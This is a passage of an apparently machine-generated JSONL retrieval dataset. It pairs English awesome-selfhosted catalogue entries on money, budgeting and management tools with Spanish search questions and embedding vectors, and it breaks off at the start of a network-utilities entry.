0.01186, -0.03486, -0.01616, -0.02656, -0.04162, -0.03893, 0.01232, -0.01854, 0.03425, 0.02192, 0.09833, 0.01706, 0.03615]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: HyperSwitch β€” Payment switch to make payments fast, reliable and affordable. Connect with multiple payment processors and route traffic effortlessly, all with a single API integration [⚠, Apache-2.0, Docker/Rust]. IHateMoney β€” Manage your shared expenses, easily [BSD-3-Clause, Docker/Python]. InvoicePlane β€” Manage quotes, invoices, payments and customers for your small business [MIT, PHP]. InvoiceShelf β€” Track expenses, payments & create professional invoices & estimates (fork of Crater) [AGPL-3.0, PHP/Docker]. Kill Bill β€” Subscription billing & payments platform. Have access to real-time analytics and financial reports [Apache-2.0, Java/Docker]. Kresus β€” Personal finance manager [AGPL-3.0, Nodejs/Docker]. Lago β€” Metering and usage-based billing [AGPL-3.0, Docker]. monetr β€” Budgeting application focused on planning for recurring expenses [FSL-1.1-MIT, Docker/K8S]. Mybucks.online β€” Secure, browser-based, password-only self-custodial cryptocurrency wallet [MIT, Nodejs].", "indexar": "quΓ© herramienta sirve para controlar gastos compartidos entre varios miembros?", "v": [0.02223, 0.16318, -0.15893, -0.19961, 0.0385, -0.13735, -0.0049, -0.03594, -0.03019, -0.13778, -0.06934, 0.01572, 0.02078, -0.12976, 0.08252, -0.05207, 0.06504, -0.07663, 0.0182, 0.04769, -0.03044, -0.04741, 0.0482, -0.03212, -0.12822, 0.00707, 0.06743, -0.12784, -0.17633, 0.1479, 0.07321, -0.02644, 0.01088, -0.03836, -0.02906, -0.07662, -0.04023, 0.04691, 0.0709, 0.08711, -0.01429, 0.02682, -0.09782, -0.08662, 0.0768, 0.04099, -0.1644, 0.12439, 0.06288, 0.09464, -0.08262, -0.00589, -0.0947, 0.09494, -0.04828, -0.16443, 0.14832, -0.12249, -0.03187, -0.07859, -0.11492, -0.03648, 0.0607, 0.04628, -0.13851, -0.0483, -0.02572, -0.02658, -0.08666, 0.10295, -0.08113, 0.038, -0.05334, 0.01101, -0.02447, 0.0287, 0.0371, 0.01391, 0.04763, -0.08815, 0.09836, -0.07015, -0.05948, 0.01554, -0.04116, -0.12174, 0.07985, -0.05096, 0.01439, -0.01475, 0.00176, -0.02464, 0.00698, -0.00378, 0.01396, 0.06062, 0.06946, 0.04455, 0.02054, 0.06756, 0.17523, -0.02427, -0.11849, 0.07988, -0.05624, 0.10652, -0.02151, -0.03161, -0.03944, -0.0129, 0.04988, 0.10751, 0.0313, -0.02849, -0.05107, 0.05007, -0.01764, 0.02244, 0.04046, -0.05929, 0.00469, 0.0421, -0.01144, 0.03507, 0.0793, -0.02598, -0.0202, 0.13796, 0.06975, 0.01533, -0.0311, -0.0449, 0.03895, 0.00279, -0.07613, -0.05229, -0.028, -0.06557, -0.06434, -0.04078, -0.03243, 0.00634, -0.03083, -0.11122, 0.10489, -0.02997, 0.03971, 0.01326, -0.00293, 0.0381, 0.02365, -0.03011, 0.00165, 0.00496, -0.04144, 0.02367, -0.02104, 0.00789, -0.08023, -0.01457, -0.06505, -0.00973, 0.03769, 0.01975, 0.07454, -0.11407, -0.00726, 0.01317, 0.0174, 0.08392, 0.03182, 0.04083, 0.03362, -0.01922, -0.02189, -0.07351, -0.02439, -0.10676, 0.04625, -0.08154, -0.02738, 0.02588, -0.0737, 0.01436, 0.00976, 0.01752, -0.00187, 0.01705, 0.03384, 0.01085, -0.00916, 0.03904, 0.03153, -0.05059, 0.03118, -0.03128, -0.05391, -0.11398, 0.08804, -0.01561, 0.00383, 0.01871, 0.02608, -0.01983, 0.0396, 0.00264, -0.02892, 0.01861, 0.03653, 0.05056, 0.03947, -0.01088, 0.03261, -0.01837, 0.00833, 0.00464, 0.05363, -0.05287, -0.04757, 0.00614, 0.0616, 0.00327, 0.02024, -0.03719, 0.08378, 0.01199, -0.00123, 0.01715, 0.03912, 0.00797, -0.00769, -0.0099, -0.00304, -0.00662, 0.04989, -0.04803, 0.0303, -0.03886, -0.06634, -0.00505, -0.03331, 0.06544, -0.04594, -0.03949, -0.05951, -0.04163, -0.02761, 0.00511, -0.02965, -0.05063, 0.01508, 0.00654, 0.05292, -0.03396, -0.02739, -0.0284]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: MyFin Budget β€” Personal finances platform (web + REST API + Android) that'll help you budget, keep track of your income/spending and forecast your financial future [GPL-3.0, Nodejs/Docker]. OctoBot β€” Cryptocurrency trading bot [GPL-3.0, Python/Docker]. Ocular β€” Simplistic and straightforward budgeting app to track your budget across months and years [MIT, Docker]. OpenBudgeteer β€” Budgeting app based on the Bucket Budgeting Principle [AGPL-3.0, Docker/C#]. Receipt Wrangler β€” Easy-to-use receipt manager, powered by AI. Allows users to create receipts effortlessly and quickly, categorize and more [⚠, AGPL-3.0, Docker]. REI3 β€” Manage tasks, time, assets and much more within your business [MIT, Go]. SHKeeper β€” Cryptocurrency payment processor with the unique combination of gateway and merchant allowing you to accept payments in multiple cryptocurrencies without fees and intermediaries [GPL-3.0, Python]. SolidInvoice β€” Open source invoicing and quote application [MIT, PHP].", "indexar": "que programa hay para gestionar presupuestos personales y prever el futuro financiero?", "v": [0.07871, -0.04567, -0.01347, -0.22059, 0.18168, -0.05328, 0.06681, -0.13139, -0.1864, -0.14136, -0.0021, 0.07015, -0.01114, 0.00036, -0.06435, -0.00117, -0.02058, -0.10493, 0.03519, 0.04618, 0.05425, 0.00394, 0.03307, -0.00333, -0.00079, -0.0252, 0.11171, -0.12141, -0.06408, -0.02363, 0.16365, -0.01059, 0.08841, -0.0856, 0.03576, 0.1114, 0.07354, 0.05597, -0.05575, -0.0504, 0.17084, -0.00723, 0.05616, 0.01373, 0.15003, -0.06373, -0.00315, 0.05086, 0.00143, -0.06523, -0.01509, -0.00063, 0.08207, 0.12216, 0.10725, -0.01041, -0.06413, -0.10166, -0.07461, -0.07663, -0.09431, 0.00934, 0.08645, 0.09496, -0.07474, 0.08872, 0.10094, 0.01653, -0.06765, -0.00551, -0.03615, -0.02103, -0.01412, 0.07898, -0.01159, -0.03564, 0.05847, 0.03568, -0.10526, -0.08386, -0.15071, -0.07166, -0.01121, 0.11275, -0.11263, -0.04934, -0.01666, 0.07439, -0.03897, 0.01796, -0.14921, 0.01804, -0.11043, -0.05525, -0.03719, 0.12164, 0.04108, 0.01216, -0.02615, -0.02529, 0.01132, -0.0888, -0.1773, 0.0772, -0.07042, 0.16338, 0.08848, 0.02733, -0.04656, -0.00095, -0.08462, 0.05137, 0.02231, -0.0375, -0.0005, 0.01448, 0.04546, 0.06637, 0.09829, -0.02484, -0.00442, 0.03705, 0.00521, 0.03285, 0.05584, 0.00194, 0.06201, 0.00943, 0.01157, 0.09913, -0.07114, 0.00653, -0.04564, 0.00625, -0.08805, -0.01265, -0.04196, 0.01159, 0.0252, -0.05317, -0.05662, 0.03168, -0.00595, 0.0018, 0.03895, -0.0693, -0.01009, -0.01882, -0.0098, 0.02637, 0.07077, -0.0412, -0.07631, 0.08085, 0.01001, -0.06699, 0.05805, 0.10649, -0.07841, 0.0295, -0.0436, -0.02645, -0.01018, -0.00629, -0.00925, -0.09227, 0.00535, 0.04417, 0.02671, 0.06946, 0.04848, 0.05555, 0.08543, -0.03902, 0.06058, -0.08117, 0.04643, -0.07165, 0.03449, 0.00229, -0.0544, -0.02386, 0.00978, 0.02591, -0.03293, -0.036, -0.01886, 0.05481, -0.02545, 0.00501, -0.03285, -0.00345, -0.06132, 0.02988, 0.02071, -0.03694, -0.02068, 0.01129, -0.00285, 0.02966, 0.04381, 0.01203, 0.03042, 0.02259, 0.02268, 0.07156, -0.04756, -0.01796, -0.00751, 0.06702, 0.02925, -0.02493, 0.06581, -0.00692, 0.01596, 0.02426, 0.04257, 0.03849, -0.01765, 0.022, -0.00331, -0.02116, 0.04585, 0.00835, 0.02571, -0.03239, -0.00864, -0.00324, 0.03877, -0.02556, -0.01422, 0.00916, -0.06946, -0.00412, -0.03824, 0.038, -0.00396, -0.06574, -0.04326, -0.08172, 0.0274, 0.05801, -0.01098, -0.06731, -0.04934, 0.00547, -0.10305, 0.01902, -0.02026, -0.00595, 0.0309, 0.02319, 0.00421, 0.03094, 0.05119, -0.01138]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: MyFin Budget β€” Personal finances platform (web + REST API + Android) that'll help you budget, keep track of your income/spending and forecast your financial future [GPL-3.0, Nodejs/Docker]. OctoBot β€” Cryptocurrency trading bot [GPL-3.0, Python/Docker]. Ocular β€” Simplistic and straightforward budgeting app to track your budget across months and years [MIT, Docker]. OpenBudgeteer β€” Budgeting app based on the Bucket Budgeting Principle [AGPL-3.0, Docker/C#]. Receipt Wrangler β€” Easy-to-use receipt manager, powered by AI. Allows users to create receipts effortlessly and quickly, categorize and more [⚠, AGPL-3.0, Docker]. REI3 β€” Manage tasks, time, assets and much more within your business [MIT, Go]. SHKeeper β€” Cryptocurrency payment processor with the unique combination of gateway and merchant allowing you to accept payments in multiple cryptocurrencies without fees and intermediaries [GPL-3.0, Python]. SolidInvoice β€” Open source invoicing and quote application [MIT, PHP].", "indexar": "con que puedo montar un sistema de trading automΓ‘tico en criptomonedas?", "v": [0.15609, 0.08677, -0.11056, -0.09109, -0.11118, -0.02396, -0.03419, 0.06088, -0.17807, -0.02647, -0.12135, -0.1302, 0.13963, -0.03324, 0.09098, -0.04275, -0.0369, -0.18973, 0.07129, -0.02726, 0.04812, -0.18752, -0.00297, -0.13072, 0.02618, 0.04439, -0.10006, -0.059, -0.26002, 0.03254, 0.09051, 0.00743, 0.10467, -0.00645, -0.01521, -0.08802, -0.01387, -0.00512, 0.0687, -0.0471, 0.06017, -0.10183, 0.05448, -0.00154, 0.08685, 0.02916, 0.06871, -0.01326, -0.01579, -0.06031, 0.07371, -0.01843, -0.13493, 0.00805, 0.06812, -0.0393, 0.1153, 0.02882, -0.00048, -0.04362, 0.06131, 0.15208, 0.08102, 0.04171, -0.06676, 0.02597, -0.00609, 0.13497, -0.05818, 0.10039, 0.0357, 0.01069, -0.02474, 0.07338, 0.03594, 0.07022, 0.01548, -0.00096, -0.02657, 0.01035, -0.06961, -0.05688, -0.01419, 0.16315, 0.08982, -0.03533, 0.0002, 0.00542, 0.055, 0.00928, -0.05604, 0.00576, 0.07231, 0.00468, 0.1279, -0.00243, -0.04991, -0.01542, -0.0745, -0.00202, 0.03674, 0.02776, -0.08868, 0.12634, 0.04143, -0.00451, 0.06593, -0.03118, 0.03504, -0.0969, 0.02879, 0.04617, -0.05742, 0.0132, -0.06902, -0.06995, 0.02836, 0.05177, -0.02377, 0.12081, -0.07773, 0.02401, -0.06171, 0.01394, 0.06915, -0.02724, -0.00602, 0.07993, 0.00722, -0.00534, 0.00167, -0.00955, -0.08737, -0.03042, -0.00278, 0.01282, -0.01408, 0.03464, -0.06781, 0.06978, 0.01119, 0.05162, 0.04726, -0.12938, 0.11782, 0.0155, 0.02162, -0.10718, 0.04468, -0.05168, 0.00279, 0.07477, 0.00879, -0.05146, -0.05173, -0.09644, 0.06792, -0.08951, -0.0282, 0.064, 0.03654, 0.10397, 0.03756, -0.02514, -0.0729, 0.08001, -0.03897, -0.0037, 0.01609, 0.01521, 0.0187, 0.07292, 0.09525, -0.04296, 0.06129, -0.02967, -0.01764, -0.05324, 0.04382, -0.02622, -0.02836, 0.02581, 0.02731, -0.02063, 0.02935, 0.012, 0.02745, 0.06249, 0.0082, 0.02955, -0.00414, 0.04003, -0.06102, 0.02217, 0.03473, 0.00829, -0.00446, -0.00193, -0.0249, -0.02468, -0.01137, 0.08244, 0.05524, -0.03612, -0.03998, 0.05818, 0.01361, 0.03073, 0.04877, 0.02344, 0.0035, -0.01516, 0.03303, -0.03659, -0.00862, -0.0369, -0.02288, 0.01985, -0.09304, -0.0385, -0.01118, 0.00645, 0.0821, 0.02199, -0.02137, 0.01269, 0.00131, 0.04873, 0.03877, -0.00587, -0.03007, -0.00139, -0.03713, 0.01267, 0.04843, 0.03036, 0.03554, 0.00102, -0.07757, -0.03508, 0.02292, 0.05217, 0.03193, -0.03693, -0.03868, -0.05014, -0.05383, -0.02249, -0.04205, -0.07569, -0.00346, 0.0364, 0.02265, -0.04274, -0.01698, 0.02892]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: MyFin Budget β€” Personal finances platform (web + REST API + Android) that'll help you budget, keep track of your income/spending and forecast your financial future [GPL-3.0, Nodejs/Docker]. OctoBot β€” Cryptocurrency trading bot [GPL-3.0, Python/Docker]. Ocular β€” Simplistic and straightforward budgeting app to track your budget across months and years [MIT, Docker]. OpenBudgeteer β€” Budgeting app based on the Bucket Budgeting Principle [AGPL-3.0, Docker/C#]. Receipt Wrangler β€” Easy-to-use receipt manager, powered by AI. Allows users to create receipts effortlessly and quickly, categorize and more [⚠, AGPL-3.0, Docker]. REI3 β€” Manage tasks, time, assets and much more within your business [MIT, Go]. SHKeeper β€” Cryptocurrency payment processor with the unique combination of gateway and merchant allowing you to accept payments in multiple cryptocurrencies without fees and intermediaries [GPL-3.0, Python]. SolidInvoice β€” Open source invoicing and quote application [MIT, PHP].", "indexar": "cual es una alternativa libre a los gestores de facturas comerciales?", "v": [0.13862, -0.00816, -0.02423, -0.11344, -0.01703, -0.01682, 0.091, 0.02205, -0.21218, -0.10926, -0.11485, -0.1099, 0.01652, 0.02799, 0.10244, -0.03653, 0.0969, -0.15927, 0.13735, 0.01373, 0.00533, -0.00624, -0.01433, -0.09996, -0.09861, -0.04063, 0.00091, -0.18318, -0.07107, 0.11143, 0.14956, -0.09542, 0.04548, -0.13309, 0.05002, 0.04272, 0.05092, 0.04407, 0.17494, -0.05856, 0.20706, -0.05657, -0.1091, -0.03481, 0.06801, -0.08078, -0.01275, -0.03787, -0.01962, 0.07581, -0.06164, -0.07006, -0.12509, 0.06472, 0.0152, 0.06175, 0.00714, 0.03546, -0.0032, -0.06385, 0.03581, 0.05127, 0.07989, 0.06012, 0.03748, 0.00149, 0.06915, 0.00851, 0.01798, 0.01167, -0.02993, 0.01717, -0.05895, 0.01225, -0.04812, 0.07583, 0.04947, 0.01239, -0.03593, 0.03109, 0.06128, -0.12147, -0.09304, 0.08079, -0.05271, -0.03134, -0.00416, -0.07212, -0.02933, 0.02985, 0.00536, -0.02737, -0.0188, 0.07471, 0.0092, 0.0202, 0.03726, 0.07505, -0.06637, 0.15589, -0.01747, 0.15101, -0.11647, 0.01842, 0.05055, 0.07333, -0.0401, -0.05991, 0.02893, 0.0622, -0.02526, 0.04594, 0.03981, 0.00418, 0.01722, -0.01649, 0.01322, 0.01087, -0.06581, 0.07824, 0.02854, -0.06129, 0.05524, -0.01683, 0.08189, 0.07974, 0.04103, 0.10111, 0.02822, 0.06525, 0.02158, -0.01435, -0.0065, -0.07673, -0.12132, -0.00746, -0.02538, -0.03403, 0.06287, 0.06031, -0.05841, -0.0632, 0.02684, 0.01456, 0.05771, -0.04162, -0.0226, -0.06408, -0.02761, 0.03993, 0.01056, -0.00231, -0.02811, 0.13664, -0.00092, 0.03606, 0.03634, 0.00376, -0.05862, 0.07651, 0.04739, -0.01143, 0.01414, 0.0287, -0.03179, -0.05645, -0.06328, 0.05757, -0.02474, 0.04734, -0.00488, 0.00969, 0.08068, -0.05098, 0.08366, -0.06711, -0.05363, -0.10146, 0.06028, -0.03233, -0.00459, -0.01854, -0.07579, 0.0049, -0.0446, -0.01161, -0.07373, 0.04946, 0.07371, 0.04847, 0.03118, 0.04777, -0.11374, -0.05579, -0.05633, -0.00435, -0.02852, -0.01007, -0.07616, 0.00971, -0.03497, -0.07748, 0.00726, 0.02927, -0.0039, 0.00179, -0.05919, 0.08494, 0.0844, 0.05005, -0.00987, 0.01096, 0.03204, -0.05504, -0.05784, -0.03557, -0.02827, -0.01869, 0.04377, -0.02997, 0.02061, 0.03008, 0.03447, -0.02678, 0.02328, 0.05881, -0.00485, 0.08522, -0.05895, -0.00271, -0.042, 0.00586, 0.01743, 0.07009, -0.0179, 0.00137, 0.02987, -0.00777, -0.00425, -0.02074, 0.06333, 0.07273, -0.0107, -0.03154, -0.04322, 0.00745, -0.07359, -0.05327, -0.06167, -0.0093, -0.01261, 0.02734, 0.01807, 0.04113, 0.06517, -0.00411]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Sure β€” Personal finance application for everyone (fork of Maybe) [AGPL-3.0, Docker]. VoucherVault β€” Store and manage vouchers, coupons, loyalty and gift cards digitally. Supports expiry notifications, transaction histories, file uploads and OIDC SSO [GPL-3.0, Docker]. Wallos β€” Lightweight personal subscription tracker with statistics and optional notifications [GPL-3.0, PHP/Docker]. WYGIWYH β€” Simple and powerful finance tracker [AGPL-3.0, Docker/Python]. YAFFA β€” Personal finance web application, that can be used to keep track of your money, expenses, budgets, and investments. It also helps with long-term financial planning [MIT, PHP].", "indexar": "que programa hay para gestionar vouchers y tarjetas de regalo", "v": [0.08676, 0.03718, -0.07688, -0.24673, 0.02378, -0.03264, 0.09834, 0.09183, 0.00208, -0.131, -0.07383, -0.12516, 0.02642, -0.09235, -0.0875, 0.05636, 0.11701, -0.04267, 0.10969, 0.18218, 0.09521, 0.10474, -0.02986, -0.08382, -0.08018, 0.03621, 0.06244, -0.05978, -0.06314, 0.19551, 0.08214, -0.14955, -0.03083, -0.22882, 0.05295, 0.01374, 0.0415, 0.06281, 0.10469, -0.03985, 0.0737, 0.0555, 0.04421, 0.0281, 0.0626, -0.06096, 0.03595, 0.05451, 0.06588, -0.0483, -0.01709, -0.09085, -0.00207, -0.04105, 0.13098, -0.05514, -0.07955, -0.125, -0.08149, -0.03371, -0.03801, 0.04136, 0.02305, 0.01737, 0.01716, 0.06202, 0.09834, -0.01944, -0.09766, 0.03958, -0.09486, 0.01721, 0.05692, -0.00466, 0.00633, 0.02228, -0.03211, 0.02106, 0.00986, 0.01399, 0.05075, 0.01228, 0.03879, 0.06435, -0.00124, 0.01283, 0.00445, -0.00123, 0.05654, -0.06171, -0.06605, 0.03047, -0.03552, -0.02049, -0.01828, -0.00448, 0.03999, -0.02104, -0.01793, 0.09725, 0.02317, -0.06999, -0.12116, 0.08501, -0.02885, 0.09992, 0.04185, 0.01894, -0.04356, 0.06136, -0.08491, 0.01477, -0.02543, 0.00206, -0.05872, 0.05862, 0.07926, -0.00568, 0.06313, 0.08069, -0.17632, -0.00883, -0.02566, 0.04152, 0.11473, 0.07908, -0.0673, 0.11595, -0.01064, 0.09256, -0.05099, 0.00552, -0.01437, -0.0514, -0.05924, -0.06595, 0.03189, 0.01954, -0.02829, -0.00162, 0.0007, 0.04213, 0.07295, 0.05414, 0.07139, -0.01982, -0.0041, 0.00134, -0.02138, 0.09902, 0.00239, -0.04683, 0.05717, 0.00535, 0.00976, -0.01919, 0.02952, -0.02866, -0.08285, -0.01654, -0.0617, -0.04212, -0.00433, 0.11952, 0.0412, -0.04573, -0.00089, 0.02589, 0.02647, 0.12242, -0.00088, 0.0557, 0.06572, 0.09638, 0.04796, -0.1066, 0.00794, -0.05716, 0.00629, -0.03506, -0.05068, 0.03431, 0.11138, 0.00041, -0.03163, -0.0077, -0.01508, 0.11949, 0.07155, -0.00992, 0.02909, 0.02347, 0.02797, 0.04227, 0.05537, -0.01841, -0.0068, 0.01697, -0.05616, -0.03669, -0.01702, 0.01559, 0.02252, -0.0372, 0.01689, 0.06435, -0.02024, 0.03095, 0.09468, 0.1001, -0.01828, -0.01944, -0.00197, -0.01235, -0.06392, -0.0219, -0.02372, 0.09153, 0.07114, -0.01403, 0.03008, -0.01139, -0.02033, 0.06347, 0.01054, -0.02622, 0.02209, 0.04605, 0.05292, -0.01251, 0.04261, -0.04917, -0.00262, 0.02166, 0.02192, -0.00406, 0.04086, -0.02457, -0.02487, -0.00567, -0.01656, 0.05824, -0.01986, -0.02594, -0.10745, -0.01639, -0.03089, -0.04676, -0.04233, 0.00837, -0.01811, -0.02447, -0.01354, -0.00511, 0.02335, -0.00289]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Sure β€” Personal finance application for everyone (fork of Maybe) [AGPL-3.0, Docker]. VoucherVault β€” Store and manage vouchers, coupons, loyalty and gift cards digitally. Supports expiry notifications, transaction histories, file uploads and OIDC SSO [GPL-3.0, Docker]. Wallos β€” Lightweight personal subscription tracker with statistics and optional notifications [GPL-3.0, PHP/Docker]. WYGIWYH β€” Simple and powerful finance tracker [AGPL-3.0, Docker/Python]. YAFFA β€” Personal finance web application, that can be used to keep track of your money, expenses, budgets, and investments. It also helps with long-term financial planning [MIT, PHP].", "indexar": "con que puedo seguir mis suscripciones automΓ‘ticamente", "v": [0.01231, 0.26484, -0.09333, 0.04476, 0.15943, -0.05694, -0.04893, -0.08623, -0.19707, -0.05328, -0.04606, -0.02035, 0.08092, -0.0794, -0.00791, 0.02758, -0.01094, -0.0861, -0.08433, 0.12941, 0.09359, -0.11373, -0.0465, -0.10124, 0.00111, -0.07083, 0.08574, 0.06649, -0.21261, -0.06031, -0.03849, 0.1131, 0.06546, -0.01777, 0.07081, -0.0373, -0.03028, 0.13499, -0.02294, 0.10163, 0.02932, 0.02307, -0.05635, 0.03047, 0.01164, -0.0202, 0.02652, 0.0549, -0.08981, -0.03162, 0.00568, -0.01266, -0.09385, 0.0044, -0.0957, 0.09043, 0.175, -0.13101, 0.02009, 0.01274, 0.00217, 0.02252, 0.00696, 0.00348, 0.05822, 0.02054, 0.01478, -0.05758, -0.01962, 0.12437, 0.02946, 0.04782, -0.08066, -0.02185, 0.05125, 0.12551, -0.05679, -0.01934, 0.10181, 0.09368, -0.06988, -0.02266, -0.04844, 0.06579, 0.0082, -0.03236, -0.03508, -0.0777, 0.04791, -0.03072, 0.04688, -0.04751, -0.00133, 0.05398, 0.03946, -0.04128, -0.04032, -0.04882, -0.00605, 0.06376, -0.00533, -0.05619, 0.02632, 0.08322, -0.04078, -0.02724, 0.03056, -0.0154, -0.02025, 0.02367, -0.01927, 0.03773, -0.10102, -0.08961, -0.00962, -0.03737, -0.03181, 0.00432, 0.07611, 0.01878, -0.0381, -0.08244, 0.0272, -0.01454, 0.01303, -0.03072, -0.06433, 0.10572, 0.03628, 0.02775, -0.04777, 0.07866, -0.0428, -0.07962, 0.00983, 0.04143, -0.08606, 0.06479, 0.01711, -0.09001, 0.06298, 0.02445, 0.00866, -0.02285, 0.04782, -0.13783, -0.03946, -0.16018, -0.00107, -0.01163, -0.06696, 0.03782, 0.06202, 0.10894, 0.00559, 0.02862, 0.10337, -0.06569, 0.06574, 0.05167, -0.02505, 0.03237, -0.05381, 0.02337, -0.04017, -0.0078, -0.02788, -0.04686, -0.04332, 0.00661, -0.04888, 0.06272, -0.00116, -0.0995, -0.01341, -0.04138, -0.05038, -0.01276, 0.09647, -0.08114, -0.05356, 0.0355, -0.05133, -0.01164, -0.0629, -0.05609, 0.02924, -0.10552, 0.05547, 0.04264, -0.00081, 0.02233, -0.04077, -0.02083, -0.0482, -0.01093, -0.03923, 0.02502, -0.00125, -0.07647, -0.09387, 0.04763, -0.03738, 0.02235, 0.0238, 0.03334, -0.02056, 0.0433, 0.0218, 0.03438, 0.01353, 0.01287, 0.08662, -0.00508, -0.08036, -0.00392, 0.04662, -0.06909, -0.01069, -0.00215, 0.02882, 0.06954, 0.1019, -0.01173, -0.00851, 0.003, 0.03588, 0.03549, 0.06541, 0.09276, -0.08001, 0.0642, -0.02704, -0.03885, 0.08732, 0.03896, 0.00061, -0.04509, -0.05704, -0.00041, 0.02205, 0.0198, 0.02248, -0.04003, -0.03732, -0.05769, -0.04648, 0.03909, 0.03713, -0.05983, 0.02597, 0.03334, 0.05002, -0.0415, 0.05577, 0.00175]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Sure β€” Personal finance application for everyone (fork of Maybe) [AGPL-3.0, Docker]. VoucherVault β€” Store and manage vouchers, coupons, loyalty and gift cards digitally. Supports expiry notifications, transaction histories, file uploads and OIDC SSO [GPL-3.0, Docker]. Wallos β€” Lightweight personal subscription tracker with statistics and optional notifications [GPL-3.0, PHP/Docker]. WYGIWYH β€” Simple and powerful finance tracker [AGPL-3.0, Docker/Python]. YAFFA β€” Personal finance web application, that can be used to keep track of your money, expenses, budgets, and investments. It also helps with long-term financial planning [MIT, PHP].", "indexar": "cual es una alternativa libre para controlar mi presupuesto personal", "v": [-0.04312, 0.10326, -0.08169, -0.13897, -0.03292, -0.04661, -0.03509, -0.00485, -0.14439, -0.121, -0.08858, -0.07911, 0.05675, -0.00248, -0.00451, -0.1365, 0.02308, -0.06165, 0.14106, 0.07725, -0.02411, -0.06297, 0.00527, 0.01561, -0.05441, -0.05293, 0.06341, -0.02344, -0.13822, -0.03884, 0.0323, -0.00453, 0.05669, 0.00565, 0.00014, 0.0733, 0.15254, 0.17276, 0.06063, -0.03499, 0.08016, -0.03874, 0.05955, 0.08694, 0.09851, -0.05038, -0.02374, 0.16027, -0.01714, 0.03538, -0.10174, 0.02428, 0.02451, 0.13659, 0.08231, -0.02018, 0.03424, -0.1465, -0.07312, -0.11022, -0.09214, -0.07967, 0.05899, 0.05473, -0.08061, 0.06646, -0.03944, -0.02432, -0.08022, 0.00365, 0.04956, -0.05837, -0.07848, 0.0166, -0.08436, 0.00062, -0.01112, -0.00478, 0.00827, -0.02834, -0.05388, -0.08764, -0.02428, 0.08159, -0.10461, -0.02951, 0.01125, -0.07714, 0.02982, 0.1602, -0.01364, -0.08117, -0.08314, 0.08538, -0.09496, 0.00865, 0.0154, 0.12415, -0.0512, 0.04611, 0.07092, -0.04802, -0.17652, 0.09134, 0.07009, 0.09836, 0.03702, 0.05193, -0.11882, -0.04001, -0.07069, 0.06988, 0.02808, 0.02313, 0.01074, -0.07454, -0.00402, 0.09949, 0.05702, 0.00897, -0.00486, 0.03296, -0.01989, -0.05328, 0.09091, 0.05759, 0.06719, 0.00654, -0.00035, 0.08038, 0.06883, 0.00072, -0.01962, -0.08844, -0.03751, -0.05235, -0.02032, -0.03445, 0.0051, 0.03063, -0.10167, -0.02783, 0.00422, -0.02126, 0.07972, -0.07962, -0.07375, -0.00213, 0.01188, 0.00528, 0.04702, -0.00548, 0.0456, 0.11451, 0.00382, 0.02771, -0.0493, 0.08379, -0.06146, 0.07289, -0.01341, -0.02049, -0.0178, -0.0167, 0.05285, -0.06721, -0.05164, -0.00565, -0.02235, 0.0283, -0.00115, 0.09075, 0.09362, -0.05669, 0.07415, -0.16535, 0.05297, -0.14128, 0.02597, 0.00207, 0.02166, 0.05764, -0.08668, -0.01802, 0.0397, -0.0188, 0.01243, 0.04073, 0.00631, -0.00561, -0.06392, 0.03344, -0.00448, -0.08656, -0.00823, -0.0131, 0.00897, -0.03735, -0.05167, 0.01109, 0.06341, 0.01866, 0.00709, -0.03328, 0.00085, -0.04375, -0.02087, -0.03879, 0.00532, 0.03954, 0.10417, 0.00022, 0.07305, -0.00937, -0.02881, 0.08603, 0.08046, -0.04771, 0.03132, -0.02523, 0.0677, 0.01727, 0.03233, -0.01931, -0.01025, -0.00298, -0.00718, 0.0019, -0.0244, 0.00328, -0.01547, -0.00967, -0.03953, 0.02413, -0.0058, 0.00094, 0.01137, -0.03965, -0.01375, 0.0072, 0.07045, 0.09168, -0.04072, -0.04253, -0.03472, 0.00281, -0.08978, -0.01378, -0.04207, -0.02701, 0.06288, 0.06546, 0.01935, 0.01443, -0.00198, 0.00505]} -{"tipo": "pregunta", "herramienta": "Network Utilities", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Network Utilities", "tema": "network utilities", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Network Utilities: beelzebub β€” Honeypot framework designed to provide a highly secure environment for detecting and analyzing cyber attacks [⚠, MIT, Docker/K8S/Go]. Canary Tokens β€” Generates lightweight, embedded honeypot triggers called canary tokens for detecting unauthorized access [BSD-3-Clause, Docker/Python]. MyIP β€” All in one IP 